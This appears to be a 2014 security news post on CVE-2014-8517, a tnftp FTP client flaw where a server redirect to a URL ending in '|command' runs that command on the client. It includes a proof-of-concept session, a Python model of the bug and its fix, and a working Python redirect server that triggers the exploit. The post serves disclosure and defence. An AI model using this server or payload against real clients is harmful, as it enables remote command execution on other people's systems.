Serious remote command execution vulnerability in the FTP client affects multiple Unix systems
Posted: 2014-11-02 16:15
On October 28 a public mailing-list post disclosed a remote command execution vulnerability in the FTP client (tnftp, the ftp(1) command on the BSDs and OS X, shipped on Linux as the tnftp/lukemftp package). Affected Unix systems include Fedora, Debian, NetBSD, FreeBSD and OpenBSD, and even the latest release of Apple's OS X, Yosemite 10.10.
A NetBSD developer, Jared McNeill, confirmed that the flaw lets a web server run arbitrary commands on any client that fetches a URL with tnftp; it has been assigned CVE-2014-8517. The cause: when no output file is given with -o, tnftp names the downloaded file after the last path component of the URL it ends up at, including after an HTTP redirect, and a name beginning with `|` goes down the same code path as a user-typed `-o '|command'`, which opens the rest of the name as a shell pipeline with popen(). A malicious or compromised server therefore only needs to redirect the client to a URL whose last component is `|command`. Until a patched ftp(1)/tnftp is installed, do not fetch HTTP URLs from untrusted servers with ftp, or always give an explicit output name with -o so the name is never taken from the URL. His proof of concept follows (the forum's link encoding obfuscated the redirect target; it is reconstructed here from the directory listing as http://localhost/cgi-bin/|uname%20-a):
a20$ pwd
/var/www/cgi-bin
a20$ ls -l
total 4
-rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect
-rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a
a20$ cat redirect
#!/bin/sh
echo 'Status: 302 Found'
echo 'Content-Type: text/html'
echo 'Connection: keep-alive'
echo 'Location: http://localhost/cgi-bin/|uname%20-a'
echo
a20$
a20$ ftp http://localhost/cgi-bin/redirect
Trying ::1:80 ...
ftp: Can't connect to `::1:80': Connection refused
Trying 127.0.0.1:80 ...
Requesting http://localhost/cgi-bin/redirect
Redirected to http://localhost/cgi-bin/|uname%20-a
Requesting http://localhost/cgi-bin/|uname%20-a
    32      101.46 KiB/s
32 bytes retrieved in 00:00 (78.51 KiB/s)
NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36 ADT 2014  Jared@Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIEBOARD evbarm
a20$

The 32 bytes "retrieved" are the output of the CGI script named `|uname -a`; tnftp then writes them into a pipe to `uname -a`, and the kernel banner printed last is that command running on the client.

Affected scope and advisories

Debian, Red Hat, Gentoo, Novell (SuSE Linux), DragonFly, FreeBSD, OpenBSD and Apple have been made aware of the issue; Debian, Red Hat, Gentoo and Novell have already published advisories.
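The decision that makes the transcript above work, and the check that the fix adds, modelled as an added Python example. This is not tnftp's code (the real client, usr.bin/ftp/fetch.c, is C); it reproduces only the save-name logic. Function names, the `-` and path-separator rejections, and the constructed redirect URL with `printf` standing in for `uname -a` are this example's own assumptions.

```python
"""Model of the tnftp save-name logic behind CVE-2014-8517 and of its fix.

Added illustration, not tnftp's code: only the decision that matters is
reproduced (which names reach the '|command' pipe path), in Python.
"""
import os
import subprocess
from urllib.parse import unquote, urlsplit


def output_name_from_url(url):
    """Last path component of the final (post-redirect) URL, percent-decoded.
    This is the name a fetcher uses when the user gave no -o option."""
    return unquote(urlsplit(url).path.rsplit("/", 1)[-1])


def store(name, body, directory):
    """Write 'body' to the output target. A name beginning with '|' is the
    client's long-standing convention for "pipe the download into a shell
    command" (as with -o '|cmd'); the rest of the name runs under /bin/sh."""
    if name.startswith("|"):
        proc = subprocess.run(name[1:], shell=True, input=body,
                              capture_output=True, cwd=directory)
        return "executed", proc.stdout
    path = os.path.join(directory, name)
    with open(path, "wb") as fh:
        fh.write(body)
    return "saved", path


def save_vulnerable(final_url, body, directory, user_outfile=None):
    """Pre-fix: a URL-derived name reaches store() unchecked, so a server
    that redirects to .../|cmd gets 'cmd' run on the client."""
    name = user_outfile if user_outfile is not None else output_name_from_url(final_url)
    return store(name, body, directory)


def save_fixed(final_url, body, directory, user_outfile=None):
    """Post-fix: only a name the local user typed may use the '|' convention.
    A name taken from the URL must be a plain file name in the current
    directory: no '|' or '-' prefix, no path separator, not empty, '.' or '..'.
    (Which extra prefixes to reject is this example's choice.)"""
    if user_outfile is not None:
        return store(user_outfile, body, directory)
    name = output_name_from_url(final_url)
    if (not name or name in (".", "..") or "/" in name
            or name.startswith("|") or name.startswith("-")):
        raise ValueError("refusing unsafe output name taken from URL: %r" % name)
    return store(name, body, directory)


if __name__ == "__main__":
    import tempfile
    work = tempfile.mkdtemp()
    # Constructed redirect target mirroring the PoC, with a harmless command.
    evil = "http://localhost/cgi-bin/|printf%20owned"
    print(save_vulnerable(evil, b"", work))
    try:
        save_fixed(evil, b"", work)
    except ValueError as err:
        print("fixed client:", err)
    print(save_fixed("http://localhost/cgi-bin/redirect", b"hello\n", work))
```

The point of keeping `store()` unchanged is that the pipe convention itself is a feature; the bug is trusting a remote party to choose the name that reaches it. The fix therefore sits at the boundary where the name is derived from the URL, not in the code that honours `|`.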
Detection script (not for illegal use)
Script by @stevelord; its opening docstring is cut off in the source. It serves an HTTP endpoint that answers a vulnerable client's first request with a 302 to a URL whose last path component is `|<command>` and answers the follow-up request for that URL with an empty 200. Point a client at it with ftp http://<host>:8000/ and the command runs on the client.

"""
... And you should see the command executed.
All wrongs reversed - @stevelord
"""
import http.server
import socket
from urllib.parse import quote

hostname = socket.getfqdn()  # Set this to your IP if you have no FQDN
port = 8000  # Set this to the port you want to run this on
cmd = "uname -a; echo You probably shouldnt execute random code from the Internet. Just saying."
cmd = quote(cmd)
# The last path component of the redirect target becomes tnftp's output file
# name; the leading '|' makes tnftp pipe the download into a shell command.
redir = "http://" + hostname + ":" + str(port) + "/cgi-bin/|" + cmd


class RedirectHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(s):
        if cmd in s.path:
            # Second request: the client is fetching the '|cmd' URL; any response will do.
            s.send_response(200)
            s.end_headers()
        else:
            # First request: send the client to the pipe-named URL.
            s.send_response(302)
            s.send_header("Location", redir)
            s.end_headers()


if __name__ == "__main__":
    print("redirecting to,", redir)
    server_class = http.server.HTTPServer
    httpd = server_class((hostname, port), RedirectHandler)
    print("Started serving.")
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass
    httpd.server_close()
    print("\nStopped serving.")

Fix and further details:
[advisory links obfuscated by the forum's link encoding; not recoverable from the source]
Reference source: [link obfuscated by the forum's link encoding; not recoverable from the source]